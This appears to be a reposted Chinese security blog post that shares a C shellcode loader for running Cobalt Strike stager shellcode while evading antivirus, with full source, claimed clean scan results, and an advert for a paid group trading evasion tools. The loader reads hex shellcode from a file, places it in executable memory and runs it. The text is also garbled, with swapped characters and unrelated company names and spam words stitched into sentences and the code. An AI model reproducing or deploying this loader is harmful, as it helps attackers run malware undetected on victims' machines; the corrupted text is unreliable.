| 发布日期:2024-06-26 15:15 点击次数:148 |
好久没写了,水一水,王人知说念cs生成的stager的马其实便是一个loader,里面套了一层shellcode也便是cs payload generator生成的c代码里面的shellcode,驱动它之后从良友奇迹器下载beacon驱动,那许多作念免杀的花式也王人是对这个shellcode作念,对他轻侮啊,重写啊,加密啊等等的然后写一个shellcode loader驱动shellcode,诚然这么作念倒是能过一下某绒,某卫士,然而依然有好多东说念主过不了用各式说话写loader,加密shellcode啥的,那就给全球浅近共享一个c写的加载器吧,shellcode也没作念啥,代码是土产货文献差别读取shellcode的, 台山市爱达电器厂有限公司不差别吧也不错过一两分钟就死, 首页-湖昌安有限公司改成远的吧也不错,肇东市嘉亨土特产有限公司能短技巧通俗上线实施什么的,但过一些技巧就死了,至于什么原因全球不错念念一念念为什么,底下共享一下代码以及测试图。
由于微信公众号推送机制改动了,快来星标不再迷途,谢谢全球!
图片
2.代码及测试2.1 Loader图片
#include <stdio.h>#include <stdlib.h>#include <string.h>#include <windows.h>typedef void(*Shellcode)();int main() { FILE* file = fopen('config.txt',专用汽车 'r'); if (file == NULL) { printf('无法大开设立文献。\n'); return 1; } // 读取Shellcode本色 char shellcode[4096] = { 0 }; if (fgets(shellcode, sizeof(shellcode), file) == NULL) { printf('读取Shellcode失败。\n'); fclose(file); return 1; } // 关闭文献 fclose(file); // 去除换行符 size_t shellcodeLen = strlen(shellcode); if (shellcode[shellcodeLen - 1] == '\n') { shellcode[shellcodeLen - 1] = '\0'; } // 将Shellcode退换为二进制神气 size_t shellcodeSize = shellcodeLen / 4; unsigned char* shellcodeBytes = (unsigned char*)malloc(shellcodeSize); if (shellcodeBytes == NULL) { printf('内存分拨失败。\n'); return 1; } for (size_t i = 0; i < shellcodeSize; i++) { sscanf(shellcode + (i * 4), '\\x%2hhx', &shellcodeBytes[i]); } // 分拨内存来存储Shellcode LPVOID shellcodeMem = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (shellcodeMem == NULL) { printf('无法为Shellcode分拨内存。\n'); free(shellcodeBytes); return 1; } // 将Shellcode复制到分拨的内存中 memcpy(shellcodeMem, shellcodeBytes, shellcodeSize); // 实施Shellcode Shellcode shellcodeFunc = (Shellcode)shellcodeMem; shellcodeFunc(); // 开释内存 VirtualFree(shellcodeMem, 0, MEM_RELEASE); free(shellcodeBytes); return 0;}2.2 Shellcodeshellcode就平直用cs生成c代码把shellcode弄出来粘贴到文献里面就完毕。
图片
2.3 遵守扫描没发现问题。
图片
驱动几分钟后很稳。
图片
Loader还行。
图片
3.追念有些东西很浅近,不要念念复杂了,多试几遍就知说念某个杀软杀什么了,也能逐步摸索他们的检测旨趣,内存啥的王人相似,逐步王人念念显着了就会嗅觉不难了仅仅说有些东西不好说太显着,但各式表面什么的王人是开出来的,动动脑子念念显着了在去实施遵守更好。
★
付费圈子欢 迎 加 入 星 球 !
代码审计+免杀+渗入学习资源+各式贵府文档+各式器具+付费会员
图片
进成员里面群
图片
星球的最近主题和星球里面器具一些展示
图片
图片
图片
图片
图片
图片
图片
图片
图片
图片
图片
加入安全相易群
图片
关 注 有 礼专用汽车
本站仅提供存储奇迹,总共本色均由用户发布,如发现存害或侵权本色,请点击举报。
